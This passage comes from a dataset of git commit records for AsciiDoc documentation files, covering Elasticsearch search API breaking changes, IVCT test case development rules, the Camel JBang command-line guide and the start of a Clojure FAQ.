deprecated `phrase_slop` parameter (a synonym for the `slop` parameter) of the `multi_match` query has been removed.\n\n* The deprecated `prefix` parameter (a synonym for the `value` parameter) of the `prefix` query has been removed.\n\n* The deprecated `le` (a synonym for `lte`) and `ge` (a synonym for `gte`) parameter of the `range` query have been removed.\n\n* The deprecated multi term rewrite parameters `constant_score_auto`, `constant_score_filter` (synonyms for `constant_score`)\nhave been removed.\n\n==== Search shards API\n\nThe search shards API no longer accepts the `type` url parameter, which didn't\nhave any effect in previous versions.\n\n==== Changes to the Profile API\n\nThe `\"time\"` field showing human readable timing output has been replaced by the `\"time_in_nanos\"`\nfield which displays the elapsed time in nanoseconds. The `\"time\"` field can be turned on by adding\n`\"?human=true\"` to the request url. It will display a rounded, human readable time value.\n\n==== Scoring changes\n\n===== Query normalization\n\nQuery normalization has been removed. This means that the TF-IDF similarity no\nlonger tries to make scores comparable across queries and that boosts are now\nintegrated into scores as simple multiplicative factors.\n\nOther similarities are not affected as they did not normalize scores and\nalready integrated boosts into scores as multiplicative factors.\n\nSee https:\/\/issues.apache.org\/jira\/browse\/LUCENE-7347[`LUCENE-7347`] for more\ninformation.\n\n===== Coordination factors\n\nCoordination factors have been removed from the scoring formula. This means that\nboolean queries no longer score based on the number of matching clauses.\nInstead, they always return the sum of the scores of the matching clauses.\n\nAs a consequence, use of the TF-IDF similarity is now discouraged as this was\nan important component of the quality of the scores that this similarity\nproduces. BM25 is recommended instead.\n\nSee https:\/\/issues.apache.org\/jira\/browse\/LUCENE-7347[`LUCENE-7347`] for more\ninformation.\n\n==== Fielddata on `_uid`\n\nFielddata on `_uid` is deprecated. It is possible to switch to `_id` instead\nbut the only reason why it has not been deprecated too is because it is used\nfor the `random_score` function. If you really need access to the id of\ndocuments for sorting, aggregations or search scripts, the recommendation is\nto duplicate the id as a field in the document.\n\n==== Highlighters\n\nThe `unified` highlighter is the new default choice for highlighter.\nThe offset strategy for each field is picked internally by this highlighter depending on the\ntype of the field (`index_options`).\nIt is still possible to force the highlighter to `fvh` or `plain` types.\n\nThe `postings` highlighter has been removed from Lucene and Elasticsearch.\nThe `unified` highlighter outputs the same highlighting when `index_options` is set\n to `offsets`.\n\n==== `fielddata_fields`\n\nThe deprecated `fielddata_fields` have now been removed. `docvalue_fields` should be used instead.\n\n==== `docvalue_fields`\n\n`docvalue_fields` now have a default upper limit of 100 fields that can be requested.\nThis limit can be overridden by using the `index.max_docvalue_fields_search` index setting.\n\n==== `script_fields`\n\n`script_fields` now have a default upper limit of 32 script fields that can be requested.\nThis limit can be overridden by using the `index.max_script_fields` index setting.\n\n==== Inner hits\n\nThe source inside a hit of inner hits keeps its full path with respect to the entire source.\nIn prior versions the source field names were relative to the inner hit.\n\n==== Scroll\n\nThe `from` parameter can no longer be used in the search request body when initiating a scroll.\nThe parameter was already ignored in these situations, now in addition an error is thrown.\n\n==== Limit on from\/size in top hits and inner hits\n\nThe maximum number of results (`from` + `size`) that is allowed to be retrieved\nvia inner hits and top hits has been limited to 100. The limit can be controlled\nvia the `index.max_inner_result_window` index setting.\n\n==== Scroll queries that use the request_cache are deprecated\n\nSetting `request_cache:true` on a query that creates a scroll ('scroll=1m`)\n is deprecated and the request will not use the cache internally.\nIn future versions we will return a `400 - Bad request` instead of just ignoring\nthe hint.\nScroll queries are not meant to be cached.\n","old_contents":"[[breaking_60_search_changes]]\n=== Search and Query DSL changes\n\n==== Changes to queries\n\n* The `collect_payloads` parameter of the `span_near` query has been removed. Payloads will be\n loaded when needed.\n\n* Queries on boolean fields now strictly parse boolean-like values. This means\n only the strings `\"true\"` and `\"false\"` will be parsed into their boolean\n counterparts. Other strings will cause an error to be thrown.\n\n* The `in` query (a synonym for the `terms` query) has been removed\n\n* The `geo_bbox` query (a synonym for the `geo_bounding_box` query) has been removed\n\n* The `mlt` query (a synonym for the `more_like_this` query) has been removed.\n\n* The deprecated `like_text`, `ids` and `docs` parameters (all synonyms for `like`) of the `more_like_this` query have\nbeen removed. Also the deprecated `min_word_len` (a synonym for `min_word_length`) and `max_word_len` \n(a synonym for `max_word_length`) have been removed.\n\n* The `fuzzy_match` and `match_fuzzy` query (synonyma for the `match` query) have been removed\n\n* The `terms` query now always returns scores equal to `1` and is not subject to\n `indices.query.bool.max_clause_count` anymore.\n\n* The deprecated `indices` query has been removed.\n\n* Support for empty query objects (`{ }`) has been removed from the query DSL.\n An error is thrown whenever an empty query object is provided.\n\n* The deprecated `minimum_number_should_match` parameter in the `bool` query has\n been removed, use `minimum_should_match` instead.\n\n* The `query_string` query now correctly parses the maximum number of\n states allowed when\n \"https:\/\/en.wikipedia.org\/wiki\/Powerset_construction#Complexity[determinizing]\"\n a regex as `max_determinized_states` instead of the typo\n `max_determined_states`.\n\n* The `query_string` query no longer accepts `enable_position_increment`, use\n `enable_position_increments` instead.\n\n* For `geo_distance` queries, sorting, and aggregations the `sloppy_arc` option\n has been removed from the `distance_type` parameter.\n\n* The `geo_distance_range` query, which was deprecated in 5.0, has been removed.\n\n* The `optimize_bbox` parameter has been removed from `geo_distance` queries.\n\n* The `ignore_malformed` and `coerce` parameters have been removed from\n `geo_bounding_box`, `geo_polygon`, and `geo_distance` queries.\n\n* The `disable_coord` parameter of the `bool` and `common_terms` queries has\n been removed. If provided, it will be ignored and issue a deprecation warning.\n\n* The `template` query has been removed. This query was deprecated since 5.0\n\n* The `percolate` query's `document_type` has been deprecated. From 6.0 and later\n it is no longer required to specify the `document_type` parameter.\n\n* The `split_on_whitespace` parameter for the `query_string` query has been removed.\n If provided, it will be ignored and issue a deprecation warning.\n The `query_string` query now splits on operator only.\n\n* The `use_dismax` parameter for the `query_string` query has been removed.\n If provided, it will be ignored and issue a deprecation warning.\n The `tie_breaker` parameter must be used instead.\n\n* The `auto_generate_phrase_queries` parameter for the `query_string` query has been removed,\n use an explicit quoted query instead.\n If provided, it will be ignored and issue a deprecation warning.\n\n* The `all_fields` parameter for the `query_string` has been removed.\n Set `default_field` to *` instead.\n If provided, `default_field` will be automatically set to `*`\n\n* The `index` parameter in the terms filter, used to look up terms in a dedicated index is\n now mandatory. Previously, the index defaulted to the index the query was executed on. Now this index\n must be explicitly set in the request.\n\n* The deprecated `type` and `slop` parameter for the `match` query have been removed. Instead of\nsetting the `type`, the `match_phrase` or `match_phrase_prefix` should be used. The `slop` removed from\nthe `match` query but is supported for `match_phrase` and `match_phrase_prefix`.\n\n* The deprecated `phrase_slop` parameter (a synonym for the `slop` parameter) of the `match_phrase` query has been removed.\n\n* The deprecated `query` parameter (a synonym for the `filter` parameter) of the `constant_score` query has been removed.\n\n* The deprecated `phrase_slop` parameter (a synonym for the `slop` parameter) of the `multi_match` query has been removed.\n\n* The deprecated `prefix` parameter (a synonym for the `value` parameter) of the `prefix` query has been removed.\n\n* The deprecated `le` (a synonym for `lte`) and `ge` (a synonym for `gte`) parameter of the `range` query have been removed.\n\n* The deprecated multi term rewrite parameters `constant_score_auto`, `constant_score_filter` (synonyms for `constant_score`)\nhave been removed.\n\n==== Search shards API\n\nThe search shards API no longer accepts the `type` url parameter, which didn't\nhave any effect in previous versions.\n\n==== Changes to the Profile API\n\nThe `\"time\"` field showing human readable timing output has been replaced by the `\"time_in_nanos\"`\nfield which displays the elapsed time in nanoseconds. The `\"time\"` field can be turned on by adding\n`\"?human=true\"` to the request url. It will display a rounded, human readable time value.\n\n==== Scoring changes\n\n===== Query normalization\n\nQuery normalization has been removed. This means that the TF-IDF similarity no\nlonger tries to make scores comparable across queries and that boosts are now\nintegrated into scores as simple multiplicative factors.\n\nOther similarities are not affected as they did not normalize scores and\nalready integrated boosts into scores as multiplicative factors.\n\nSee https:\/\/issues.apache.org\/jira\/browse\/LUCENE-7347[`LUCENE-7347`] for more\ninformation.\n\n===== Coordination factors\n\nCoordination factors have been removed from the scoring formula. This means that\nboolean queries no longer score based on the number of matching clauses.\nInstead, they always return the sum of the scores of the matching clauses.\n\nAs a consequence, use of the TF-IDF similarity is now discouraged as this was\nan important component of the quality of the scores that this similarity\nproduces. BM25 is recommended instead.\n\nSee https:\/\/issues.apache.org\/jira\/browse\/LUCENE-7347[`LUCENE-7347`] for more\ninformation.\n\n==== Fielddata on `_uid`\n\nFielddata on `_uid` is deprecated. It is possible to switch to `_id` instead\nbut the only reason why it has not been deprecated too is because it is used\nfor the `random_score` function. If you really need access to the id of\ndocuments for sorting, aggregations or search scripts, the recommendation is\nto duplicate the id as a field in the document.\n\n==== Highlighters\n\nThe `unified` highlighter is the new default choice for highlighter.\nThe offset strategy for each field is picked internally by this highlighter depending on the\ntype of the field (`index_options`).\nIt is still possible to force the highlighter to `fvh` or `plain` types.\n\nThe `postings` highlighter has been removed from Lucene and Elasticsearch.\nThe `unified` highlighter outputs the same highlighting when `index_options` is set\n to `offsets`.\n\n==== `fielddata_fields`\n\nThe deprecated `fielddata_fields` have now been removed. `docvalue_fields` should be used instead.\n\n==== `docvalue_fields`\n\n`docvalue_fields` now have a default upper limit of 100 fields that can be requested.\nThis limit can be overridden by using the `index.max_docvalue_fields_search` index setting.\n\n==== `script_fields`\n\n`script_fields` now have a default upper limit of 32 script fields that can be requested.\nThis limit can be overridden by using the `index.max_script_fields` index setting.\n\n==== Inner hits\n\nThe source inside a hit of inner hits keeps its full path with respect to the entire source.\nIn prior versions the source field names were relative to the inner hit.\n\n==== Scroll\n\nThe `from` parameter can no longer be used in the search request body when initiating a scroll.\nThe parameter was already ignored in these situations, now in addition an error is thrown.\n\n==== Limit on from\/size in top hits and inner hits\n\nThe maximum number of results (`from` + `size`) that is allowed to be retrieved\nvia inner hits and top hits has been limited to 100. The limit can be controlled\nvia the `index.max_inner_result_window` index setting.\n\n==== Scroll queries that use the request_cache are deprecated\n\nSetting `request_cache:true` on a query that creates a scroll ('scroll=1m`)\n is deprecated and the request will not use the cache internally.\nIn future versions we will return a `400 - Bad request` instead of just ignoring\nthe hint.\nScroll queries are not meant to be cached.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b934f9ad683206963a4bcd8e67c2144a1644b2a3","subject":"Update Executable-Test-Case-Development-Rules.adoc","message":"Update Executable-Test-Case-Development-Rules.adoc\n","repos":"MSG134\/IVCT_Framework,MSG134\/IVCT_Framework,MSG134\/IVCT_Framework","old_file":"docs\/src\/Executable-Test-Case-Development-Rules.adoc","new_file":"docs\/src\/Executable-Test-Case-Development-Rules.adoc","new_contents":"== Executable Test Case Development Rules\n\nThese rules were discussed between nations on 18 October 2016.\n\n=== RTI compatibility\nThe ETC must be developed and tested with both Pitch and M\u00c4K RTI, last versions if possible.\nSome specific libraries (RTI adapters) will be developed in integrated in IVCT. ETC development must be done upon those RTI adapters.\n\n=== Overall ETC structure\n\n==== GitHub project name \/ Java package project name \/ Class names\nGitHub Repository name: TC_[ETC name]\nEx.: `TC_CS_Verification`\n\nExample:\n----\nTC_CS_Verification\n----\n\nJava main package name: nato.ivct.etc.tc_[ETC name], e.g.:\n----\nnato.ivct.etc.tc_cs_verification\nnato.ivct.etc.fr.tc_hla_declaration_management\n----\n\nMain class names: TC_XXXX_[meaningful name].java.\nN.B. : [meaningful name] is meaningful in the context of ETC, and is different of [ETC name] to avoid redundancy.\n\nExample for ETC HLA Declaration Management:\n----\nTC_0001_Object_Publication.java\nTC_0002_Interaction_Subscription.java\n----\n\nJava model and parameters package name: nato.ivct.etc.tc_**lib_**[ETC name], e.g.:\n----\nnato.ivct.etc.tc_lib_cs_verification\nnato.ivct.etc.fr.tc_lib_hla_declaration_management\n----\n\nETC model and parameters classes names: TC_[ETC name]__BaseModel.java and TC_[ETC name]_TcParam.java, e.g.:\n----\nTC_CS_Verification_BaseModel.java\nTC_CS_Verification_TcParam.java\n----\n\nNOTE: **Warning:** The full name of a class may be very long, e.g.: `nato.ivct.etc.tc_hla_declaration_management.TC_0001_Object_Publication`\n\n==== 3rd Party Libraries\nBecause one of the main problem with Java development is the management of dependencies (i.e. librairies), _**all new development (new ETC) must use already existing libraries**_. It will avoid some inconsistency and incompatibility between codes developed by different developers that may use different versions of the same library.\nAll 3rd party libraries must be declared in ETC Gradle files, as it is done in HelloWorld example.\n\n**Question:** Where do new 3rd party libraries must be dropped off? It seems that Gradle manages some cache.\n\n**Question:** How to have access to the libraries list that are already used by developed ETC? Who is responsible for the management of that list?\n\n=== Development Best Practices\n==== Test Case Parameters\nIt is mandatory to use JSON file to define parameter values.\n3 steps in the initialization of Test Case Parameters (file `TC_[ETC name]_TcParam.java`) :\n\n. Declaration with a NULL value\n. Assignation to the value read using JSON parser\n. Systematic check to detect invalid value\n\n==== Test Case Variables\nIt is mandatory to manage Test Case Variables in the model source code (file `TC_[ETC name]_BaseModel.java`).\n\n==== Logging\n\nIt is mandatory to use of the logger implementation (lockback) delivered by the framework.\nLockback configuration file: `[ETC name]\/src\/main\/resources\/logback.xml`.\nThere is 2 appenders: FILE and STDOUT.\nThere is currently a technical limitation that does not allow to place the output of a test case into a test case specific file. So, in order to facilitate the reading of the log file :\n\n* At the beginning of each text case, the following specific message is logged: `Start of tc_[ETC name].TC_XXXX_[meaningful name]`\nExample: `Start of tc_hla_declaration_management.TC_0001_Object_Publication`\n\n* At the beginning of each text case, the following specific message is logged:\n`End of tc_[ETC name].TC_XXXX_[meaningful name]`\nEx.: `End of tc_hla_declaration_management.TC_0001_Object_Publication`\n\n==== GUI\nNo GUI in the ETC, only parameters.\n\n==== Results\nThe result of an ETC must be the following:\n\n* INCONCLUSIVE: Corresponds to an error during initialisation (preambleAction method) or termination (postambleAction method) of the test.\n* FAILED: An error \/ a problem occurred during the execution of the ETC that leads to a failure\n* PASSED: No error \/ problem occurred during the execution of the ETC, the test is passed\n","old_contents":"== Executable Test Case Development Rules\n\nThese rules were discussed between nations on 18 October 2016.\n\n=== RTI compatibility\nThe ETC must be developed and tested with both Pitch and M\u00c4K RTI, last versions if possible.\nSome specific libraries (RTI adapters) will be developed in integrated in IVCT. ETC development must be done upon those RTI adapters.\n\n=== Overall ETC structure\n\n==== GitHub project name \/ Java package project name \/ Class names\nGitHub Repository name: TC_[ETC name]\nEx.: `TC_CS_Verification`\n\nExample:\n----\nTC_CS_Verification\n----\n\nJava main package name: nato.ivct.etc.tc_[ETC name].\nExample:\n----\nnato.ivct.etc.tc_cs_verification\nnato.ivct.etc.fr.tc_hla_declaration_management\n----\n\nMain class names: TC_XXXX_[meaningful name].java.\nN.B. : [meaningful name] is meaningful in the context of ETC, and is different of [ETC name] to avoid redundancy.\nExample for ETC HLA Declaration Management:\n----\nTC_0001_Object_Publication.java\nTC_0002_Interaction_Subscription.java\n----\n\nJava model and parameters package name: nato.ivct.etc.tc_**lib_**[ETC name].\nExample:\n----\nnato.ivct.etc.tc_lib_cs_verification\nnato.ivct.etc.fr.tc_lib_hla_declaration_management\n----\n\nETC model and parameters classes names: TC_[ETC name]__BaseModel.java and TC_[ETC name]_TcParam.java.\nExample:\n----\nTC_CS_Verification_BaseModel.java\nTC_CS_Verification_TcParam.java\n----\n\nNOTE: **Warning:** The full name of a class may be very long, e.g.: `nato.ivct.etc.tc_hla_declaration_management.TC_0001_Object_Publication`\n\n==== 3rd party libraries\nBecause one of the main problem with Java development is the management of dependencies (i.e. librairies), _**all new development (new ETC) must use already existing libraries**_. It will avoid some inconsistency and incompatibility between codes developed by different developers that may use different versions of the same library.\nAll 3rd party libraries must be declared in ETC Gradle files, as it is done in HelloWorld example.\n\n**Question:** Where do new 3rd party libraries must be dropped off? It seems that Gradle manages some cache.\n\n**Question:** How to have access to the libraries list that are already used by developed ETC? Who is responsible for the management of that list?\n\n=== Development best practices\n==== Test Case Parameters\nIt is mandatory to use JSON file to define parameter values.\n3 steps in the initialization of Test Case Parameters (file `TC_[ETC name]_TcParam.java`) :\n\n. Declaration with a NULL value\n. Assignation to the value read using JSON parser\n. Systematic check to detect invalid value\n\n==== Test Case Variables\nIt is mandatory to manage Test Case Variables in the model source code (file `TC_[ETC name]_BaseModel.java`).\n\n==== Logging\n\nIt is mandatory to use of the logger implementation (lockback) delivered by the framework.\nLockback configuration file: `[ETC name]\/src\/main\/resources\/logback.xml`.\nThere is 2 appenders: FILE and STDOUT.\nThere is currently a technical limitation that does not allow to place the output of a test case into a test case specific file. So, in order to facilitate the reading of the log file :\n\n* At the beginning of each text case, the following specific message is logged: `Start of tc_[ETC name].TC_XXXX_[meaningful name]`\nExample: `Start of tc_hla_declaration_management.TC_0001_Object_Publication`\n\n* At the beginning of each text case, the following specific message is logged:\n`End of tc_[ETC name].TC_XXXX_[meaningful name]`\nEx.: `End of tc_hla_declaration_management.TC_0001_Object_Publication`\n\n==== GUI\nNo GUI in the ETC, only parameters.\n\n==== Results\nThe result of an ETC must be the following:\n\n* INCONCLUSIVE: Corresponds to an error during initialisation (preambleAction method) or termination (postambleAction method) of the test.\n* FAILED: An error \/ a problem occurred during the execution of the ETC that leads to a failure\n* PASSED: No error \/ problem occurred during the execution of the ETC, the test is passed\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1f218828944f7385962f476b8fe343828e73ac41","subject":"Update 2017-02-20-Testing-DNS-Infrastructure-with-Goss.adoc","message":"Update 2017-02-20-Testing-DNS-Infrastructure-with-Goss.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2017-02-20-Testing-DNS-Infrastructure-with-Goss.adoc","new_file":"_posts\/2017-02-20-Testing-DNS-Infrastructure-with-Goss.adoc","new_contents":"= Testing DNS Infrastructure with Goss\n:hp-tags: Goss, DNS, Testing, DevOps, Linux, Monitoring\n:hp-image: images\/covers\/OFFLINE.jpg\n","old_contents":"= Testing DNS Infrastructure with Goss\n:hp-tags: Goss, DNS, Testing, DevOps, Linux, Monitoring\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"07fd3e7f2261460ebc25401d907e990656b1180b","subject":"CAMEL-17199: update documentation to align Camel JBang CLI usage w\/ Karavan (#6442)","message":"CAMEL-17199: update documentation to align Camel JBang CLI usage w\/ Karavan (#6442)\n\n","repos":"apache\/camel,tadayosi\/camel,apache\/camel,pax95\/camel,cunningt\/camel,adessaigne\/camel,adessaigne\/camel,christophd\/camel,christophd\/camel,pax95\/camel,apache\/camel,cunningt\/camel,adessaigne\/camel,christophd\/camel,christophd\/camel,cunningt\/camel,tadayosi\/camel,apache\/camel,tadayosi\/camel,apache\/camel,adessaigne\/camel,cunningt\/camel,christophd\/camel,christophd\/camel,tadayosi\/camel,pax95\/camel,pax95\/camel,cunningt\/camel,pax95\/camel,tadayosi\/camel,apache\/camel,adessaigne\/camel,tadayosi\/camel,cunningt\/camel,adessaigne\/camel,pax95\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-jbang.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-jbang.adoc","new_contents":"= Camel JBang\n\nA JBang-based Camel app for searching for kamelets, components, languages, running routes.\n\nThe `camel-jbang` is available from *Camel 3.12* and newer versions.\n\nWhen running Camel JBang, it is possible to set the Camel version to use. For instance, to run the commands with the version 3.13.0, define the `camel.jbang.version` property in the command line.\n\n== Using Camel JBang\n\nThe CamelJBang supports multiple commands. Running the command below, will print all of them:\n\n[source,bash]\n----\njbang -Dcamel.jbang.version=3.13.0 CamelJBang@apache\/camel [command]\n----\n\n*Note*: the first time you run this command, it may cause dependencies to be cached, therefore taking a few extra seconds to run.\n\nAll the commands support the `--help` and will display the appropriate help if that flag is provided.\n\n=== Search\n\nYou can use the CLI to search for kamelets, components, languages and miscelaneous components (others). Running the following command will present a list of items that can be searched:\n\n[source,bash]\n----\njbang -Dcamel.jbang.version=3.13.0 CamelJBang@apache\/camel search --help\n----\n\nFor example, to search for kamelets named `jms`, you can use:\n\n[source,bash]\n----\njbang -Dcamel.jbang.version=3.13.0 CamelJBang@apache\/camel search kamelets --search-term=jms\n----\n\nTo list all the kamelets, just run the command without any search term:\n\n[source,bash]\n----\njbang -Dcamel.jbang.version=3.13.0 CamelJBang@apache\/camel search kamelets\n----\n\n\nThe same behavior also works for all the other search commands. The table below lists all search commands available at the moment:\n\n|===\n|Command |Description\n\n|kamelets\n|search for kamelets\n\n|components\n|search for components\n\n|languages\n|search for languages\n\n|others\n|search for miscellaneous components\n\n|===\n\n\n=== Init Kamelets\n\nThe init sub-command can be used to simplify creating Kamelets. Through this command, it is possible to create new Kamelets through pre-configured templates. It works in two steps: first it is necessary to bootstrap the Kamelet by creating a properties file with the parameters necessary to create the Kamelet. Once the properties file is correctly set, then it is possible to create a pre-filled Kamelet by processing that properties file.\n\nTo bootstrap the Kamelet run:\n\n[source,bash]\n----\njbang -Dcamel.jbang.version=3.13.0 CamelJBang@apache\/camel init kamelet --bootstrap\n----\n\nThis will create a sub-directory called `work` in the current directory with a properties file named `init-template.properties` inside it.\n\nThe keys of the properties file are commented with the details about what need to be filled in order to generate the Kamelet. If a value is missing, it will be ignored when generating the Kamelet and will need to be filled in manually later.\n\nAfter you have filled the values, you can generate the Kamelet using:\n\n[source,bash]\n----\njbang -Dcamel.jbang.version=3.13.0 CamelJBang@apache\/camel init kamelet --properties-path work\/init-template.properties\n----\n\nRunning this command will create a new file in the `work` directory. The name of the generated file is determined by the `kameletMetadataName` property in the properties file. As such, parsing the default properties file would generate a file named `my-sample-sink.kamelet.yaml` in the directory.\n\nAfter the file is generated, it may still need to require final adjustments, such as correctly setting the name, the icon and other requirements for official Kamelets. Please consult the Kamelet development documentation for updated details.\n\n\n=== Init Bindings\n\nThe init sub-command can also be used to simplify creating Kamelets bindings. Through this command, it is possible to create new bindings through pre-configured templates. Use the `--kamelet` option (you can list the available ones using the search command) to set the Kamelet to generate the binding for.\n\nTo execute this feature run:\n\n[source,bash]\n----\njbang -Dcamel.jbang.version=3.13.0 CamelJBang@apache\/camel init binding --destination \/path\/to\/destination\/directory\/ --kamelet sftp-source\n----\n\nThis will create a new sample YAML binding file that can be modified and used in Camel K.\n\nYou can also generate bindings that can be run by CamelJBang or Camel Core, but setting the `--project` option:\n\n[source,bash]\n----\njbang -Dcamel.jbang.version=3.13.0 CamelJBang@apache\/camel init binding --destination \/path\/to\/destination\/directory\/ --kamelet sftp-source --project core\n----\n\n\n== Running Routes\n\nAt the moment it is possible to run YAML-based routes which also refer to Kamelets in the catalog.\n\nIn order to do so, write a YAML-based file with the `route`, the `steps` and the `to` destination for the route. The following example, shows a route that uses the Timer Source Kamelet to produce messages every second. The body of the messages will be logged to the standard output. Subsequently, they will be sent to a AMQP 1.0 compliant broker using the JMS AMQ 1.0 Sink Kamelet.\n\n[source,yaml]\n----\n- route:\n from:\n uri: \"kamelet:timer-source\"\n parameters:\n period: 1000\n message: \"Hello Camel JBang\"\n steps:\n - log: \"${body}\"\n - to:\n uri: \"kamelet:jms-amqp-10-sink\"\n parameters:\n remoteURI: amqp:\/\/localhost:61616\n destinationName: test-queue\n----\n\nExecute the following command to run this route:\n\n[source,bash]\n----\njbang -Dcamel.jbang.version=3.13.0 CamelJBang@apache\/camel run jms-amqp-10-sink-binding.yaml\n----\n\nNOTE: it is necessary to have a AMQP 1.0 broker, such as Apache Artemis, running locally and listening on port 61616. Adjust the route accordingly if using a different address for the broker.\n\n\n== Installation\n\nIt is not necessary to install Camel JBang. However, if you prefer to do so, JBang makes it easy for us by providing an installation feature that works with Github. If you have JBang installed on your system, then you can run the following command to install CamelJBang:\n\n[source,bash]\n----\njbang app install CamelJBang@apache\/camel\n----\n","old_contents":"= Camel JBang\n\nA JBang-based Camel app for searching for kamelets, components, languages, running routes.\n\nThe `camel-jbang` is available from *Camel 3.12* and newer versions.\n\n== Installation\n\nJBang makes it easy for us by providing an installation feature that works with Github. If you have JBang installed on your system, then you can run the following command to install CamelJBang:\n\n[source,bash]\n----\njbang app install CamelJBang@apache\/camel\n----\n\n== Using Camel JBang\n\nThe CamelJBang supports multiple commands. Running the command below, will print all of them:\n\n[source,bash]\n----\nCamelJBang.java [command]\n----\n\nAll the commands support the `--help` and will display the appropriate help if that flag is provided.\n\n=== Search\n\nYou can use the CLI to search for kamelets, components, languages and miscelaneous components (others). Running the following command will present a list of items that can be searched:\n\n[source,bash]\n----\nCamelJBang.java search --help\n----\n\nFor example, to search for kamelets named `jms`, you can use:\n\n[source,bash]\n----\nCamelJBang.java search kamelets --search-term=jms\n----\n\nTo list all the kamelets, just run the command without any search term:\n\n[source,bash]\n----\nCamelJBang.java search kamelets\n----\n\n\nThe same behavior also works for all the other search commands. The table below lists all search commands available at the moment:\n\n|===\n|Command |Description\n\n|kamelets\n|search for kamelets\n\n|components\n|search for components\n\n|languages\n|search for languages\n\n|others\n|search for miscellaneous components\n\n|===\n\n\n=== Init Kamelets\n\nThe init sub-command can be used to simplify creating Kamelets. Through this command, it is possible to create new Kamelets through pre-configured templates. It works in two steps: first it is necessary to bootstrap the Kamelet by creating a properties file with the parameters necessary to create the Kamelet. Once the properties file is correctly set, then it is possible to create a pre-filled Kamelet by processing that properties file.\n\nTo bootstrap the Kamelet run:\n\n[source,bash]\n----\nCamelJBang init kamelet --bootstrap\n----\n\nThis will create a sub-directory called `work` in the current directory with a properties file named `init-template.properties` inside it.\n\nThe keys of the properties file are commented with the details about what need to be filled in order to generate the Kamelet. If a value is missing, it will be ignored when generating the Kamelet and will need to be filled in manually later.\n\nAfter you have filled the values, you can generate the Kamelet using:\n\n[source,bash]\n----\nCamelJBang init kamelet --properties-path work\/init-template.properties\n----\n\nRunning this command will create a new file in the `work` directory. The name of the generated file is determined by the `kameletMetadataName` property in the properties file. As such, parsing the default properties file would generate a file named `my-sample-sink.kamelet.yaml` in the directory.\n\nAfter the file is generated, it may still need to require final adjustments, such as correctly setting the name, the icon and other requirements for official Kamelets. Please consult the Kamelet development documentation for updated details.\n\n\n=== Init Bindings\n\nThe init sub-command can also be used to simplify creating Kamelets bindings. Through this command, it is possible to create new bindings through pre-configured templates. Use the `--kamelet` option (you can list the available ones using the search command) to set the Kamelet to generate the binding for.\n\nTo execute this feature run:\n\n[source,bash]\n----\nCamelJBang init binding --destination \/path\/to\/destination\/directory\/ --kamelet sftp-source\n----\n\nThis will create a new sample YAML binding file that can be modified and used in Camel K.\n\nYou can also generate bindings that can be run by CamelJBang or Camel Core, but setting the `--project` option:\n\n[source,bash]\n----\nCamelJBang init binding --destination \/path\/to\/destination\/directory\/ --kamelet sftp-source --project core\n----\n\n\n== Running Routes\n\nAt the moment it is possible to run YAML-based routes which also refer to Kamelets in the catalog.\n\nIn order to do so, write a YAML-based file with the `route`, the `steps` and the `to` destination for the route. The following example, shows a route that uses the Timer Source Kamelet to produce messages every second. The body of the messages will be logged to the standard output. Subsequently, they will be sent to a AMQP 1.0 compliant broker using the JMS AMQ 1.0 Sink Kamelet.\n\n[source,yaml]\n----\n- route:\n from:\n uri: \"kamelet:timer-source\"\n parameters:\n period: 1000\n message: \"Hello Camel JBang\"\n steps:\n - log: \"${body}\"\n - to:\n uri: \"kamelet:jms-amqp-10-sink\"\n parameters:\n remoteURI: amqp:\/\/localhost:61616\n destinationName: test-queue\n----\n\nExecute the following command to run this route:\n\n[source,bash]\n----\nCamelJBang run jms-amqp-10-sink-binding.yaml\n----\n\nNOTE: it is necessary to have a AMQP 1.0 broker, such as Apache Artemis, running locally and listening on port 61616. Adjust the route accordingly if using a different address for the broker.\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b9d7703854a318427ae951dbde7c56aae9c9b506","subject":"faq tweak","message":"faq tweak\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/faq.adoc","new_file":"content\/guides\/faq.adoc","new_contents":"= Frequently Asked Questions\nAlex Miller\n2015-01-01\n:type: guides\n:toc: macro\n:icons: font\n\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\ntoc::[]\n\nThese questions and answers are adapted from mailing lists and other Clojure community forums.\n\n== Reader and Syntax\n\n[[why_keywords]]\n**What's the advantage of representing text tokens as keywords (instead of as strings)?**\n\nKeywords are cached and interned. This means that a keyword is reused (reducing memory) everywhere in your program and that checks for equality really become checks for identity (which are fast). Additionally, keywords are invokable to look themselves up in a map and thus this enables the common pattern of extracting a particular field from a collection of maps possible.\n\n[[reader_macros]]\n**Why does Clojure not have user-extensible reader macros?**\n\nThe reader takes text (Clojure source) and returns Clojure data, which is subsequently compiled and evaluated. Reader macros tell the Clojure reader how to read something that is not a typical s-expression (examples are things like quoting `'` and anonymous functions `#()`). Reader macros can be used to define entirely new syntaxes read by the reader (for example: JSON, XML, or other formats) - this is a more powerful syntactic capability than regular macros (which come into play later at compile time). \n\nHowever, unlike Lisp, Clojure does not allow the user to extend this set of reader macros. This avoids the possibility of creating code that another user cannot read (because they do not have the proper reader macros). Clojure gives back some of the power of reader macros with tagged literals, allowing you to create generically readable _data_, that is still extensible.\n\n[[underscore]]\n**What does an _ mean in a let binding or parameter?**\n\n_ has no special meaning in Clojure as a symbol. However, it is a convention to use _ (or a leading _) to denote a binding that will not be used in the expression.\n\n[source,clojure]\n----\n(defn get-x [point]\n (let [[x _] point] ;; y-value of point is unused, so mark it with _\n x))\n----\n\n== Collections, Sequences, and Transducers\n\n[[conj]]\n**Why does `conj` add to the front of a list and the back of a vector?**\n\nMost Clojure data structure operations, including `conj` (conjoin), are designed to give the user a performance expectation. With `conj`, the expectation is that insertion should happen at the place where this operation is efficient. Lists (as linked lists) can make a constant time insertion only at the front. Vectors (indexed) are designed to expand at the back. As the user, you should consider this when you choose which data structure to use. In Clojure, vectors are used with much greater frequency.\n\n[[seqs_vs_colls]]\n**I keep forgetting that after calling sequence functions on vectors\/sets, the return value no longer is no longer has vector or set semantics.**\n\nGenerally 